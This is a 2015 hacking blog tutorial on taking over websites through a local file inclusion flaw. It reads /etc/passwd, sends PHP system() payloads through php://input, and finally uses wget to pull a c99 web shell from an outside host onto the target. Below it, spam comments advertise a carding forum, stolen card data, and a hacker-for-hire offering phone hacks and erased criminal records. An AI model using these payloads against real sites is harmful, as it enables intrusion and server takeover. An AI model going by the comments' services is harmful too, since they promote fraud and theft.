WELCOME TO CYBER NINJAS OFFICIAL BLOG! BROWSE GREAT POST ABOUT TECH , GADGETS AND MANY MORE THANKS FOR VISITING!
AD SPACE

Thursday, 12 March 2015

LFI EXPLOITATION VIA PHP://input





Hey guys,
Today I'll be explaining how to shell a website using "php://input" method via LFI.



So let's get started.

Now let's have our target shall we. As an example, your target URL should look like this:

Code:

http://www.site.com/index.php?page=

You can have anything similar to that as long as you can be able to read files and obtain an "include" error.



First things first, give it a shot and see if you can read "/etc/passwd"



URL will look like:

Code:

http://www.site.com/index.php?page=/etc/passwd


If successful, you'll be having a page that looks like this:

   


                     



Now lets try reading:

Code:

/proc/self/environ

/proc/self/fd




So URL will become:

Code:

http://www.site.com/index.php?page=/proc/self/environ

http://www.site.com/index.php?page=/proc/self/fd


Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.

   


                     



Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.

This can be done using the "Hackbar" or by using "Live HTTP headers"



I'll show you how to exploit via php://input using the "Hackbar"



So lets check what we're supposed to use in the Hackbar

   


                    



Now let's try putting this method in action.

Look at the picture carefully.

   


                    



URL will be:

Code:

http://www.site.com/index.php?page=php://input


and POST DATA:

Code:

<? system('uname -a'); ?>


Other commands

List directories

Code:

 <? system('ls'); ?>


Identification

Code:

<? system('id'); ?>


Convert format

Code:

<? system('mv file.txt file.php'); ?>


Alright, let's spawn a shell there now shall we.



Grab a shell from sh3ll.org or anywhere else.

For now, we'll be using the normal c99 shell

Code:

http://www.sh3ll.org/c99.txt?



Let's use the "wget" command to spawn our shell on the site.



So our POST DATA will be:

Code:

<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>


This is how it's gonna look like.

   


                   



Now that you've spawn a shell, you can now navigate to your shell on the site.

Code:

http://www.site.com/shell.php



   

3 comments:

  1. publicity team, we invite you to purchase banner or topic on www.cardvilla.net, we have reasonable price for big carding forum, we have banners from all big shops, we want you to join us, it will boost your sale, you can check our forum that we have a big range of paid banners, some banners are only visible for register members so if you want to see our all banners please register also , , , if you interested to purchase advertisement please contact jabber or icq you see on main page of www.cardvilla.net thanks

    ReplyDelete
  2. Darknet legit financial vendors and scam marketplace reviews | FULLZ, CC can be bought
    from Deepweb -
    testing deep web financial vendors .

    ReplyDelete
  3. This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

    -Phone hacks (remotely)
    -Credit repair
    -Bitcoin recovery (any cryptocurrency)
    -Make money from home (USA only)
    -Social media hacks
    -Website hacks
    -Erase criminal records (USA & Canada only)
    -Grade change
    -funds recovery

    Email: onlineghosthacker247@ gmail .com

    ReplyDelete

Adbox